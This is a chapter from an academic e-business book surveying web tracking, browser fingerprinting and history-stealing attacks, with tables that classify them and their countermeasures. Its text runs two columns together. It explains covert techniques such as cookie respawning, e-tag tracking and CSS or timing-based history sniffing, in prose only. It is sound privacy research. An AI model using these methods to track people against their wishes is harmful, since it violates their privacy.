Research and Development in E-Business through Service-Oriented Solutions
Katalin Tarnay University of Pannonia, Hungary & Budapest University of Technology and Economics, Hungary
Sandor Imre Budapest University of Technology and Economics, Hungary
Lai Xu Bournemouth University, UK
A volume in the Advances in E-Business Research (AEBR) Book Series Managing Director: Lindsay Johnston Editorial Director: Joel Gamon Production Manager: Jennifer Yoder Publishing Systems Analyst: Adrienne Freeland Development Editor: Myla Merkel Assistant Acquisitions Editor: Kayla Wolfe Typesetter: Christina Henning Cover Design: Jason Mull
Published in the United States of America by Business Science Reference (an imprint of IGI Global) 701 E. Chocolate Avenue Hershey PA 17033 Tel: 717-533-8845 Fax: 717-533-8661 E-mail: [email protected] Web site: http://www.igi-global.com
Copyright © 2013 by IGI Global. All rights reserved. No part of this publication may be reproduced, stored or distributed in any form or by any means, electronic or mechanical, including photocopying, without written permission from the publisher. Product or company names used in this set are for identification purposes only. Inclusion of the names of the products or companies does not indicate a claim of ownership by IGI Global of the trademark or registered trademark.
Library of Congress Cataloging-in-Publication Data Research and development in e-business through service-oriented solutions / Katalin Tarnay, Sandor Imre and Lai Xu, editors. pages cm Includes bibliographical references and index. Summary: “This book highlights the main concepts of e-business as well as the advanced methods, technologies, and aspects that focus on technical support for professors, students, researchers, developers, and other industryexperts in order to provide a vast amount of specialized knowledge sources for promoting e-business”--Provided by publisher. ISBN 978-1-4666-4181-5 (hardcover) -- ISBN 978-1-4666-4182-2 (ebook) -- ISBN 978-1-4666-4183-9 (print & perpetual access) 1. Service-oriented architecture (Computer science) 2. Data mining. 3. Electronic commerce. I. Tarnay, Katalin. II. Imre, S?ndor. III. Xu, Lai, 1970- TK5105.5828.R47 2013 658.8’72--dc23
2013009512
This book is published in the IGI Global book series Advances in E-Business Research (AEBR) Book Series (ISSN: 1935- 2700; eISSN: 1935-2719)
British Cataloguing in Publication Data A Cataloguing in Publication record for this book is available from the British Library.
All work contributed to this book is new, previously-unpublished material. The views expressed in this book are those of the authors, but not necessarily of the publisher. 134
Chapter 7 Tracking and Fingerprinting in E-Business: New Storageless Technologies and Countermeasures
Károly Boda Gábor György Gulyás Budapest University of Technology and Budapest University of Technology and Economics, Hungary Economics, Hungary
Ádám Máté Földes Sándor Imre Budapest University of Technology and Budapest University of Technology and Economics, Hungary Economics, Hungary
ABSTRACT Online user tracking is a widely used marketing tool in e-business, even though it is often neglected in the related literature. In this chapter, the authors provide an exhaustive survey of tracking-related identification techniques, which are often applied against the will and preferences of the users of the Web, and therefore violate their privacy one way or another. After discussing the motivations behind the information-collecting activities targeting Web users (i.e., profiling), and the nature of the information that can be collected by various means, the authors enumerate the most important techniques of the three main groups of tracking, namely storage-based tracking, history stealing, and fingerprinting. The focus of the chapter is on the last, as this is the field where both the techniques intended to protect users and the current legislation are lagging behind the state-of-the-art technology; nevertheless, the authors also discuss conceivable defenses, and provide a taxonomy of tracking techniques, which, to the authors’ knowledge, is the first of its kind in the literature. At the end of the chapter, the authors attempt to draw the attention of the research community of this field to new tracking methods.
DOI: 10.4018/978-1-4666-4181-5.ch007
Copyright © 2013, IGI Global. Copying or distributing in print or electronic forms without written permission of IGI Global is prohibited. Tracking and Fingerprinting in E-Business
INTRODUCTION as pursuing behavioral advertising or monetiz- ing user profiles by other means. According to Many Website operators involved in end-user the report of IAB Internet Advertising Revenue oriented e-business have an interest in monetizing Report (IAB, 2012), the advertising revenues set their user base (e.g., by realizing as many clicks a new record at $8.4 billion in Q1 2012, clearly on their advertisements as possible). One way of showing the significance and the growth of the achieving this goal is collecting diverse informa- advertising industry. tion about the user (or profiling her), the vehicles In two recent studies, Goldfarb & Tucker of which are technologies that can be used for (January and May, 2011) concluded that targeted identifying returning visitors, and those that infer advertising can successfully influence individuals sensitive information (such as browsing history) in favor of buying a product, and targeted advertis- that users are not necessarily willing to disclose ing has a significant positive (economic) impact (e.g., purchase preferences). This controversial on advertising. These claims are consistent with method may be a necessity for better serving the the ever-increasing presence of Web tracking needs of online customers, but it often goes beyond techniques (the most used tools for profiling) and user demands, and is used for business purposes the revenues the industry reached in 2012, presum- against the will of the clients. ably with a continuously increasing proportion It is not surprising that certain users are of behavioral advertising. By summarizing the concerned about pervasive profiling. In fact, measurements of Krishnamurthy & Wills between this problem has been discussed from so many 2006 and 2012 (Krishnamurthy & Wills, 2006; viewpoints in academia that not only effective 2009; Krishnamurthy, 2010), Mayer & Mitchell technological, but also more or less effective leg- (2012) highlighted that the coverage on top sites islative countermeasures have been implemented of large tracking companies increased during these in order to mitigate the privacy risks arising from years, and so did the number of trackers per page. the proliferation of a subset of profiling-related Today, researchers estimate that there are track- technologies. That said, this chapter is inspired ers capable of monitoring more than one fifth of by the rest (primarily by fingerprinting attacks), user activity while browsing online (Roesner et for which neither defensive technology nor the al., 2012). law seems to be able to keep up with the pace However, as can be expected, tracking for of development dictated by pro-profiling actors, targeted advertising is not favored by users. A leaving users of the Web powerless against and Harris Interactive poll (Krane, 2008), a TRUSTe vulnerable to them. survey (2009), and a nationally representative telephone survey in the USA conducted by Turow et al. (2009) uniformly confirmed that the majority PROFILING AND USER of individuals (around 60% in all cases) found it PRIVACY ON THE WEB uncomfortable when they faced advertisements on Websites adjusted to their preferences by pre- There are several motives of profiling users on viously observing their online activities. A more the Web. For instance, an enormous number of recent online survey conducted by McDonald & Web services can be accessed for free; however, Cranor (2010) also confirmed this result with contrary to how it looks (or is communicated), 55% of respondents rejecting targeted advertising; free access often comes with a greater sacrifice another recent survey conducted by TRUSTe in of user privacy, as many of these companies gain partnership with Harris Interactive (2011) reported revenue from profiling-related activities, such a higher rate of respondents, namely 85%, who
135 Tracking and Fingerprinting in E-Business
would not consent to being tracked for targeted fingerprints all types of devices (Oracle, 2011). advertising. Somewhat in contrast with user attitude towards Nevertheless, targeted advertising is not the commercial tracking, a survey of TRUSTe & only goal of tracking and profiling; there are several Harris Interactive (2011) shows that 42% of re- other commercial use cases. Besides monetizing spondents would consent to tracking to enhance profiles in trades (i.e., exchanging large databases security and to detect frauds. It must be noted that of pseudonymous profiles), they can be utilized such identification can be used for quite different to provide additional user interface features; for and questionable purposes, such as identification example, recommendations on news or Web shop for censorship or surveillance, too. items, customized user interfaces, or to facilitate price discrimination (dynamic pricing, i.e., adjust- Who Needs Users to be Identified? ing price tags for customer price sensitivity for profit maximization of the vendor). There are several actors in the online era arguing The case of Amazon.com–namely when the against or in favor of identification. Normally, company offered the same DVD at different prices the only participant arguing against is the user for different customers–is a frequently cited ex- herself, for whom identification is an undesired ample of dynamic pricing (Davis, 2000). After feature, up to the point when it brings benefits (it customers discovered pricing differences while unlocks extra functionality or the user gains extra discussing their experiences in online forums, credit). On the other hand, there are numerous Amazon had to remove this feature and apologize other participants having their own objectives and for their experiment. Amazon claimed that prices goals, who want users to be identified regardless were merely random, instead of being tailored for of their privacy preferences. customer profiles. As it has become clear so far, advertising and Web users relate a bit ambivalently to dynamic marketing companies, and other parties pursuing pricing. Although it is a known and unpopular related activities are the most prominent actors feature among them (Cranor, 2003), it becomes (e.g., search engine optimization, retargeting, rather popular when it is communicated in the analytics services). Profiles can also be used in form of discounts: according to the survey of web shops for product recommendation systems, McDonald & Cranor (2010), 80% of respondents or for assisting pricing strategies, but arbitrary would consent to tracking to receive discounts service providers may use profiles and tracking tailored for their purchase interests, suggesting to enhance the functionality of their services. that price discrimination is more acceptable if it Among many others, social networks, content is communicated as a reward or bonus rather than providers and distributors, service platforms, a way of invading privacy. hosting services belong to this category. Finally, we mention security, where tracking Data collectors and traders monetize pro- (and profiling) is applied in order to identify po- files directly. Identification also plays a strong tential malicious users and prevent intrusions. In role in censorship and surveillance, and–as dis- practice, this is pursued by many security-sensitive cussed previously–also in security; for example, companies, such as banks or credit card compa- identification can help prevent click frauds by nies. For instance, ThreatMetrix™ Cybercrime limiting the number of paid clicks per client per Defender Platform uses device identification to advertisement (Schmücker, 2011). On the other identify clients when they detect fraudulent access hand, malicious parties, such as identity thieves, to prevent further attacks (ThreatMetrix, 2012); phishers, and other kinds of online stalkers may similarly, the Oracle Adaptive Access Manager also find profiles useful.
136 Tracking and Fingerprinting in E-Business
Table 1. Classification of profiling sources The Process of Profiling
Implicit data Explicit data In the early years of the Web, tracking was the First party Services of information superpowers only way to profile users. Attributes learned by Third party Tracking Public data sources tracking are called implicit data, since these are not expressed by the user, but deduced from her actions. In the early 2000s, with the spread of information superpower and tracking users. N.b. blogs, social networks, and so forth, and the social that the case of Facebook may be a bit more content contribution to the services of the Web complex, as according to an earlier version of 2.0 era, another source of information became their privacy policy, the social service reserved available, called explicit data, referring to self- the right to crawl public data sources in order to expressed information, collected by other means extend their users’ profiles (Gulyás, 2009). (e.g., using web crawlers) for extending profiles. Development of search engines catalyzed this The Three Steps of Profiling process by supporting the access to public sources for explicit data, to the point where the spread of The implications of tracking become visible after information became real time (e.g., Shankland, understanding the context of identification and 2010). Instant accessibility and the emergence of related economic activities (i.e., how profiling is a variety of “Web and content archiving” services performed). Identification itself does no harm to (e.g., Fitzpatrick, 2012), had a negative effect on user privacy; the question is how identification is user privacy, as it simply eliminated the choice used. Implication of tracking techniques discussed of revocation. later in this chapter only differ in the extent of Classification of Information Sources identification (i.e., more generic identification implies larger profiles that has a wider range of use): while some techniques identify the user In their work, Gulyás et al. (2012) categorize only in the same browser (e.g., tracking cookies, profiling sources into three categories (complex CSS-based history stealing attacks) or the same profiling techniques may use multiple of these): device (e.g., cross-browser fingerprinting, Flash services of information superpowers (large com- PIEs), others achieve device-independent personal panies having a large service portfolio capable of identification (e.g., real-world identification via capturing a significant fragment of user activity), history stealing, biometric fingerprinting). public data sources, and tracking. Here, we further The scheme of the process of personal data refine their classification by categorizing sources collection is depicted on Figure 1. The goal of regarding the data types and the way users typi- the process is to create fine-grained user profiles cally interact with these sources. (It must be added to be used or sold. In the first step, profilers use that exceptional, but less relevant cases do exist; the previously-discussed information sources for for example, first party trackers can theoretically collecting information, the data from which is be realized, but the advertising business is based processed, combined and further refined in the rather on third-party trackers.) Our classification second step. In step three, data can be monetized is shown in Table 1. by several means. According to this classification, a social net- During the collection process, numerous types working site with a social widget in widespread of data are logged to profiles–we just highlight a use over the internet–such as Facebook’s Like few examples. Simply put, trackers can analyze button–is classified as both using sources of an
137 Tracking and Fingerprinting in E-Business
Figure 1. The process of collecting, processing and using different types of data
the visited Websites from different perspectives, Jang et al. also mention another tracker company, such as regarding their content (for contextual ClickTale, who create an aggregate heatmap of advertising), their meaning (for semantic advertis- mouse movements. According to ClickTale’s web- ing), or the attitude of the creator towards the site1, in addition to heatmaps, they record mouse content itself (for sentiment analysis)–information clicks, scroll reach, keystrokes, and offer reports that is rather static. That said, behavior profiles based on the analysis of the data. Besides, Jang et can also include clickstream information (i.e., al. note that many sites in their experiments use how the user navigates through sites, to determine their own tracking techniques instead of using where she is off the track the advertiser planned, external services. or to predict future behavior, e.g., to determine Service providers, and especially information the willingness to order an item online)Van den superpowers, are in an even better position, as they Poel & Buckinx, 2005)). There are trackers that can collect metainformation of the habits of their operate link shortening services and provide users. For instance, Google can be aware of their content sharing widgets in order to observe social users’ acquaintances (via Gmail and Google+), sharing connections (Regalado, 2012). In our daily routine (with Google Calendar), interests (via opinion, this trend will gain momentum, and Google Reader), and if Google Search is set as the advertisers will extend their view to collect even home page of a browser, Google can estimate when more metadata on daily routine, (social) behavior the computer is first turned on, and how long it is and connections. operated. By utilizing geolocalization techniques, even home and work location can be determined, What Do they Collect? which, when coupled together, can be used for unique identification (Golle & Partridge, 2009). However, trackers also reach towards a lower metalevel. Jang et al. (2010) report several cases of Privacy Implications of Identification mouse, keyboard, and clipboard tracking. Within the Alexa top 1,300 Websites, they found such When a user is identified and tracked, her activi- tracking in 115 cases, where the tracking happened ties are linked together in her profile, meaning without any visual feedback to the user. Of these a greater loss of user privacy for many reasons. sites, 7 used the behavior tracking service of tynt. For example, a profiled user can be influenced com, which reported mouseover and copy events, in her buying decisions, or her search results can and also transferred the copied text to tynt.com. be biased according to business objectives. A
138 Tracking and Fingerprinting in E-Business
profiled user is tied to her past actions, which can browsers, such as Tor and JondoFox, which are be used for abuses, denigration, or may simply reaching for such high aims (Perry et al., 2011). cause uncomfortable situations. As an example, let us imagine a father looking Penetration of User Tracking for gifts for his daughter’s birthday. After spend- Techniques ing a few hours of searching online and visiting some related sites, he leaves his laptop on his desk. We differentiate between within- and cross-site Later, his daughter arrives and uses his laptop to trackers only; however, further refinement of check out a website. We could imagine how sur- classification is possible regarding the state-of- prised she would be to see the specific gift-related the-art tracking landscape (Roesner et al., 2012). advertisements along the site. Clearly, the father In the case of the first type of trackers, the track- would have liked to separate his gift-searching ing cookie is owned by the visited site, and–since activities from regular ones. the tracker is never visited directly–the cookie is The goal would be to separate activities con- intentionally leaked for tracking (which is referred ducted on different sites, or–more formally–to to as cookie handover). Cross-site trackers own reach the unobservability of the actions of the the cookie themselves, enabling tracking user user (See Figure 2). Regarding a specific site visit, activities over site boundaries (the cookie can unobservability means anonymity towards this be set from a first- or third-party position, too). site (i.e., the visitor cannot be identified within However, both cooperation between trackers the group of visitors), plus undetectability of the and combination of these types have been reported visit for both other sites and other Web actors recently (Roesner et al., 2012). Cooperating track- (Pfitzmann & Hansen, 2010). At this time, these ers share tracking information–such as identifiers goals cannot be accomplished by using default Web and location information upon a visit–which means browsing software (not even in private browsing that a tracker that is not present can learn about it. mode; Aggarwal et al., 2010); some success, how- For instance, Roesner et al. mention the example ever, can be achieved by using anonymous Web of admeld.com leaking its tracking cookie and the
Figure 2. The scheme of undetectable web browsing: a request is unobservable for all actors, and anonymous towards communication partners (i.e., websites). Ideally, this means no actors (users and Websites) can decide whether a user made a request or not, and no Websites can specify which user made the request it received (responses are proxied through the anonymous Web browsing service).
139 Tracking and Fingerprinting in E-Business
top level page URL to turn.com. Cooperating track- Penetration of social widgets is also worth men- ers can seem to be misleadingly privacy-friendly, tioning. In May 2011, the presence of Facebook, as for cooperating parties a single detector that Google, and Twitter widgets was estimated at 33%, invokes others later or sends feedback on detours 25%, and 20% respectively among top 1,000 sites can have a larger implication on privacy than (Efrati, 2011), but surprisingly, their presence it seems. Combination of tracker types implies seems to stagnate. Roesner et al. measured the that a within-site tracker gains cross-site tracker presence of both Facebook and Google at around capability: the within-site tracker is embedded 30% among the Alexa top 500 sites, and Twitter into the detector code of the cross-site tracker (the at 18.6%. In another recent work, Kontaxis et al. cookie is owned by the cross-site tracker). In this (2012) estimate the presence of the Facebook case, the cross-site tracker learns environmental Like button at 35% among the top 10,000 sites information of the user via its tracker asset, but (in June 2012). However, widgets also provide identifies the user via the within-site tracker. income for another group of services, namely Empirical measurements on tracking tech- companies hosting embeddable widget collections niques indicate significant penetration. Gomez (e.g., AddThis), who fund their services from et al. (2009) analyzed 393,829 unique domains selling data obtained by tracking visitors (Mayer (collected by the users of the Ghostery Firefox & Mitchell, 2012). plugin) of which 88.4% used Google Analytics (a As revealed in this section, tracking is widely within-site tracker), and top 50 Websites contained adopted for tracking users. It is not realistic to at least one tracker, but some had as many as 100. assume that these techniques are going to van- Ayenson et al. found Google Analytics to be pres- ish in the near future; rather, on the contrary, ent at 97 of the QuantCast.com top 100 sites in we expect them to spread further and to develop 2011. In their recent work, Roesner et al. (2012) new forms to walk one step ahead of consumers. also confirmed significant tracker presence while In the next chapters, we review currently known analyzing the Alexa top 500, as they found 7,264 and emerging techniques. We discuss storage- instances of 524 trackers present on these sites. based tracking methods first, and “storageless” According to their work, “tracker morbidity” is techniques–which are expected to dominate in depicted as the top 20 trackers being present in near future–afterwards. 26-297 sites in the top 500. Trackers benefit from being visited as first- party sites as they are allowed to set cookies BASIS OF TRACKING: even when third-party cookies are blocked in the REGULAR TECHNIQUES browser agent. Although cross-site trackers are usually not visited directly, there are two excep- In the early years of the Internet, users were tions. First, social networking sites are visited identifiable uniquely by their IPv4 addresses, but voluntarily for their services, and as confirmed IP-based tracking soon became obsolete due to by the results of Roesner et al., some sites force the widespread use of network address translation visitors to view them from a first-party position (NAT) and dynamic IP addresses, as in both cases (e.g., by opening a popup window or applying a multiple clients may use the same address. Despite redirection chain). Clearly, both are used to cir- its inaccuracy as an identifier, the IP address is still cumvent third-party cookie blocking settings of the usable when augmented with other information browser agent, as in the case of insightexpressai. (e.g., the user agent string), and can still play a com, mentioned by Roesner et al. part in tracking as part of a unique identifier (Yen et al., 2012). In addition, the IPv4 addresses are
140 Tracking and Fingerprinting in E-Business
widely used for visitor localization. Free databases the same principles with smaller modifications exist for pairing addresses with country-city loca- (e.g., using scripts or frames). tions, such as (IpToCountry, 2012), and research Problems related to cookies can be observed indicates that even a finer-grained localization is with other storage-based mechanisms, too. As we possible going down to street level (Wang et al., have mentioned previously, some trackers leak 2011). The role of the IP addresses may change cookies intentionally, but malicious third parties in the future as IPv6 is expected to spread, since may also try to steal cookies, for instance by having its addresses are practically capable of covering their scripts included into the site content, which all existing and future devices, thereby eliminat- seems to be common: Yue & Wang (2009) found ing the need for dynamic or translated addresses. that 66.4% of sites embedded external scripts in As IP addresses were not reliable anymore, their experiment. In addition, user-contributed Websites and trackers started to store unique identi- content can also contain cookie-stealing malicious fiers on the visitors’ computers, in the storage of scripts (e.g., cross-site scripting). Cookies are their browsers, first in the cookie database. After a sent along with the request, and then, if they are while, an increasingly relevant proportion of users being transmitted without protection, they can be started to delete cookies to opt out of tracking, subject to traffic sniffing3 or active sidejacking4. and coevolution has characterized web privacy Fortunately, in contrast to cookies, most stored since then. When trackers develop new tracking objects are not transmitted automatically (e.g., techniques, related protection mechanisms follow. Flash cookies and HTML5 storages), and therefore In this section, we review the classic storage-based not affected by these threats. techniques. As a relevant fraction of users soon started deleting cookies, trackers moved to using rich Storage-Based Techniques internet application storages, such as the Flash (Local Shared Objects) and SilverLight (Isolated Cookies have some associated basic protection, Storage) storages. Both plugins are widespread such as the same-origin policy: if a Website sets (respectively 95.78%, 69.33% according to a cookie, only the same site can read it later, al- Stat Owl (2012), and their storages share some lowing the identification of returning visitors, characteristics with cookies, with additional ad- but not cross-site tracking. However, Website vantages (for trackers). Being isolated from the operators soon realized that if they installed browser, these plugins allow the use of the same Web bugs2 on multiple sites, they could easily identifier in multiple browser agents in parallel extend their reach. Web bugs are small, usually (See Figure 3), and default expiration dates also 1x1 pixel-sized invisible images, and based on a favor tracking–perhaps larger cookie sizes, too. simple mechanism. When the user visits a site, For Flash, cookie size starts from 100 KB (for and the content is loaded, the Web bug is down- requests having a larger size, the user is asked for loaded from the third-party site (i.e., the tracker), permission), and permanent expiration is set by who has a chance to read and write cookies, and default (Local Shared Object, 2012). In the first can detect the first-party site address through the years, lower awareness surrounded these tech- referrer HTTP header. Therefore, identification is niques, but nowadays users are more aware, and possible, and the web bug owner can determine there are standardized ways to control (and clear) particular attributes of the visitor in addition to their storages such as the NPAPI ClearSiteData the IP address and browser agent information. (Chandna, 2011). Subsequent tracking techniques usually leverage The first instance of announcing Flash cookies being used for tracking, were the Persistent Iden-
141 Tracking and Fingerprinting in E-Business
Figure 3. Cross-browser tracking with Flash storage. After contacting the first site (1) a Flash based Web bug is downloaded from the tracker (2). After the Web bug is loaded it sets (or reads if it exists) the identifier (3) and sends it back to the tracker directly (4), augmented with profiling information (e.g., subject of site1.com). When visiting another site with another browser, a similar process is executed (5-8), which uses the same storage.
tifier Elements (PIEs for short), which were an- percent of the Alexa top 500 stored identifiers in nounced in 2005 (Unitied Virtualities, 2005). the HTML5 LocalStorage. However, they report Later, Flash cookies were reported to be used for two cases where LocalStorage was used instead of “cookie respawning” (regenerating) cookies to cookies, and a case where cookies were respawned circumvent cookie deletion and user preferences, from LocalStorage. and were found to be present on 54 of the top 100 Different layers of the browser cache are also sites (Soltani et al., 2009). Recent follow-up re- exploited for storing identifiers. A cache control search shows that Flash cookies are still present mechanism, e-tags (or entity-tags) is used as on 37 of the top 100 sites (Ayenson et al., 2011), backup for cookies, for instance, Ayenson et al. but a lower rate was confirmed by Roesner et al. (2011) mention kissmetrics.com, and Wramner (2012), as in their experiment only 35 of 524 (2011) describes the use of e-tags in the tracking trackers used Flash, and it was used as a backup mechanisms of TradeDoubler. In their intended only in 9 cases. The latter authors highlight the use, e-tags are used to determine if the online particular case of sodahead.com, where the Flash document has changed compared to the local backup cookie was even encoded. cache, similarly to fingerprinting (hashing) docu- Ayenson et al. (2011) additionally report that ments for comparison. As a disadvantage (from trackers are also moving to HTML5 storages, as the viewpoint of a tracker), e-tags are harder to they found that 17 of the top 100 sites used them. handle, since reading and writing them requires The HTML5 storages allow larger storage (5 MB), exact URL matches. On the other hand, e-tags and similarly to Flash permanent expiration is set cannot be blocked with cookies, and they are as default. Roesner et al. (2012) find that only one even available in private browsing mode. Another
142 Tracking and Fingerprinting in E-Business
control field, the last modified timestamp can also Further Privacy Issues and be exploited similarly to e-tags, simply by giving Techniques Applied a unique date to each visitor. Cached content can also be exploited for storing The techniques discussed before can be applied identifiers. The evercookie (2010) also uses this to RSS (or Atom) channels; this is referred to as method: it draws the identifier on some pixels of RSS tracking. In his recent thesis, Danis (2011) an image, and then makes the browser cache it. analyzed the possibilities of applying regular In order to read the image, it is loaded onto an techniques to RSS channels, and found several HTML5 canvas, where images can be managed on flaws in the implementations in browsers and a pixel-level basis. Other content caches can also channel reader software. In our opinion, one of his be used to store identifiers, such as variables in Ja- most important finding is that by using internal vaScript, or entity properties in CSS. Operational frames (represented by the
143 Tracking and Fingerprinting in E-Business
origin of the arriving user (in the form of an until the developers of Firefox patched the gaping URL). However, the URL referer also indicates security hole in the 4th version of their browser the URL of the host environment for images and (See Classical CSS-based Attacks). During other embeddable content (Flash, Java, internal that period, various authors suggested different frames), and can also indicate the keywords the methods of acquiring the browser history, but the user searched for before arriving on the Website. terminology has never been sufficiently uniform, Lastly, we mention that all on-disk information leading to several different names for the same (especially traces left on public computers) is a class of attacks. potential target to offline attacks via malware, and The term “history stealing” is used in–besides therefore should be protected carefully. nonacademic contexts such as blog posts–(Wond- racek et al., 2010), while many authors prefer the use of “history sniffing” (Jakobsson & Stamm, HISTORY STEALING AND 2006; Jang et al., 2010; Weinberg et al., 2011). COUNTERMEASURES Finally, others refer to these attacks simply as “his- tory detection” (Janc & Olejnik, 2010a; 2010b), History stealing is a way of extracting a part of or “history leakage” (Wramner, 2011). the history of the browser–information which is Attacks can be categorized along various otherwise hidden from the prying eyes of a Web- properties. Most of them are scripted (e.g., site operator. In our broader interpretation of the implemented in JavaScript), though there are term, it can refer to any way of determining if a some markup language-based methods, too. site has been visited by the user. N.b. that none of Secondly, a nonscripted method can either re- these attacks can directly obtain the full browsing quire user interaction to complete the attack, or history; the adversary must choose a set of URLs leak the browser history otherwise (e.g., through to check before delivering the attack. CSS). Thirdly, attacks vary in terms of accuracy Leaking even the partial history can be dan- (i.e., how certain their result is) and robustness gerous; for instance, it can be enough to uniquely (i.e., how much the set of identified elements of identify the user within the group of visitors of a browsing history change over time). Fourthly, Website. Of course, an attack can also take the more certain attacks only query domain names, while direct approach of attempting to determine if the others work on the subdomain level. Fifthly, dif- user regularly browses controversial Websites, or ferent algorithms perform differently in terms collecting the list of service providers with which of the number of URLs that can be checked in the user does business (e.g., in order to facilitate a reasonable timeframe, and the CPU load they a subsequent social engineering attack). It must impose. Finally, other important factors include be noted that, while most history stealing attacks the repeatability and the generality of an attack. normally cannot do more direct damage to the In this section, we survey the history stealing user than that, some go as far as identifying her techniques known to date, and categorize them based on data obtained from a social networking based on the properties discussed previously, Website (See Classical CSS-Based Attacks), or and also discuss possible protection mechanisms. determining if she is a member of a Website where users must sign in to access certain features (See Timing-Based Attacks Cross-Site Timing-Based Attacks). Early techniques of history stealing exploit a Timing-based history stealing methods are timing vulnerability that had been included in browsers attacks that infer browsing habits by querying the since the adoption of Cascade Style Sheets (CSS) cache of the browser and that of the Domain Name
144 Tracking and Fingerprinting in E-Business
System or Service (DNS). The algorithms are It must be noted that cache timing-based attacks based on the intuitive assumption that obtaining (Rows N and O, Table 3) seem to be having their an object from a cache is significantly faster than renaissance (mansour, 2011; Zalewski, 2011). getting it from a remote server. These new algorithms work around the problem of The attack of Felten & Schneider (2000) on nonrepeatability by aborting the loading of the ca- the browser cache makes use of a cacheable object cheable resource after a predefined duration. If the (e.g., an image file from the main page of a news object has finished loading during that timeframe, portal). The scripted version (Row L, Table 3) it is assumed to have been cached. We have not of the method measures the access time of the experimented much with these proofs-of-concept, object, and decides that its hosting site has already but a short test with Microsoft Internet Explorer been accessed if the retrieval takes longer than a 9, Mozilla Firefox 12.0, and Google Chrome 20 predefined threshold. In the nonscripted version on a moderately powerful laptop concluded that (Row K, Table 3), a dummy file is embedded into these algorithms might not be especially reliable, the attacker’s page, followed by the test object, and as they produced a large number of false negatives. then another dummy file; then, the access time of the test object can be inferred by inspecting the Cross-Site Timing-Based Attacks timestamps of retrieving the dummy objects in the log of the Web server. Both variants have an It is also possible to mount a cross-site timing attack accuracy above 90%, as reported by the authors, (Row P, Table 3) in order to infer history for a site based on their experiments. It is worth noting that where users must log in to access certain content. the adversary may also use the cache for tracking Such methods embed a test page and a reference purposes via “cache cookies” (Row M, Table 3). page from a domain into the attacker’s Webpage, The DNS-based (Row J, Table 3) attack is and compare their loading times through the similar to the previous one, and has the exact same onerror and onload event handlers of JavaScript. variants, but it is the time to execute a DNS In the settings of Bortz et al. (2007), the refer- query to a domain that is measured. Felten & ence page is chosen such that it displays similarly Schneider argue that the attack is feasible if the for a logged-in user and a guest, while the contents cache miss penalty is significant for a specific of the test page are significantly different between domain name server; in such cases, the accuracy these groups. With certain Websites, it may also is above 90%. be possible to distinguish a logged-out member of It is uncertain if these attacks are still viable the site from non-members through this technique. with modern computers. For instance, private Protecting users from cross-site timing attacks browsing mode makes the browser wipe the is not easy. A conceivable server-side counter- cache when it terminates, thereby decreasing the measure is to make each request on a Web server accuracy of the browser cache-based attack. This execute in a fixed time, while a client-side coun- is no longer a serious penalty for the users with termeasure could be to enforce the same-origin high-speed, flat-rate internet access. In addition, policy in JavaScript for the onload and onerror we argue that the use of the first two attacks as event handlers. a means of tracking a user or profiling her is not viable, as both of them are nonrepeatable (at least Classical CSS-Based Attacks in theory). Cache cookies, on the other hand, may be efficient, provided that the cache is not wiped Several attacks rely on CSS, but the automated very often, but they require an adversary who can attacks in Janc & Olejnik (2010) are among the manipulate the expiry times of cached objects. earliest and simplest ones. They exploit the way
145 Tracking and Fingerprinting in E-Business
browsers handle the CSS pseudoclass of visited C, Table 2) with the goal of inferring the actual, links–the feature that makes it possible to color real-world identity of the user (Wondracek et al., (or otherwise format) an already visited hyperlink 2010). In order to pull this off, the adversary must differently from one that is absent from the history. have already crawled the social network; then, a The nonscripted, automated, CSS-based attack CSS-based attack can be used to discover if the (Row A, Table 2) uses a style sheet that loads a user visited the site of a predefined set of groups unique background image for a hyperlink if it is (i.e., online “clubs” with predefined topics to in the history. When the victim loads the Web which interested users can subscribe). Assuming page, the browser makes a request for each URL that a hit in this set equals an actual membership that corresponds to a visited domain. The scripted in the group, the set of hits can be matched against variant of the attack (Row B, Table 2) uses the the previously crawled social network data. Ac- getComputedStyle function of JavaScript to access cording to Wondracek et al., 42.06% of the users the style that was actually applied on an HTML of the Xing social network could be uniquely element; then, the script can directly decide if identified by this method. the corresponding domain has been visited. Both Privacy-preserving history mining (Jakobsson attacks have been well-described at least since et al., 2008) was proposed to amend the attack 2002 (Baron, 2002). with privacy-preserving features (Row D, Table An attacker can also query addresses under 2), by leaking only predefined categories of vis- the domain name of a social networking site (Row ited Websites, instead of distinct domain names.
Table 2. Classification of query-based history stealing techniques
ID Attack Accuracy Speed Technology Counter-measures Harm A Pure CSS High High CSS Baron’s defenses; pollution; Partial history leakage (Janc & Olejnik, 2010) personalization; same- origin caching and styling B Scripted CSS (Janc & Olejnik, High High CSS, JS Baron’s defenses; pollution; Partial history leakage 2010) personalization; same- origin caching and styling C Social network HS High High CSS, JS Baron’s defenses; pollution; Complete (Wondracek et al., 2010) personalization; same- identification (with origin caching and styling real name) D Privacy-preserving history Mode- High CSS, JS opt-out; Baron’s defenses; Coarse-grained mining (Jacobsson et al., 2008) rate pollution; personalization; information leakage same-origin caching and about browsing habits styling E Word CAPTCHA (Weinberg High Low CSS Unknown Partial history leakage et al., 2011) F Character CAPTCHA High Low CSS Unknown Partial history leakage (Weinberg et al., 2011) G Pawn task (Weinberg et al., High Low CSS Unknown Partial history leakage 2011) H Jigsaw puzzle (Weinberg et High Low CSS Unknown Partial history leakage al., 2011) I Webcam attack (Weinberg et Mode- Low Flash, image Unknown Partial history leakage al., 2011) rate acquisition and processing
146 Tracking and Fingerprinting in E-Business
Table 3. Classification of timing-based history stealing techniques
ID Attack Accuracy Speed Technology Counter-measures Harm J DNS timing (Felten & Schneider, High Moderate DNS (JS) Unknown Partial history leakage 2000) K Naive cache timing (Felten & High Moderate N/A Unknown Partial history leakage Schneider, 2000) L Scripted naive cache timing High Moderate JS Unknown Partial history leakage (Felten & Schneider, 2000) M Cache cookie High Moderate JS Unknown The cache cookie (Felten & Schneider, 2000) allows tracking of the user N Enhanced cache timing (mansour, Low High JS Unknown Partial history leakage 2011) O Enhanced cache timing (Zalewski, Low High JS Unknown Partial history leakage 2011) P Cross-site timing (Bortz et al., De-pends N/A JS Fixed-time requests; Discovery of mem- 2007) on site same-origin onerror bership in an online and onload service
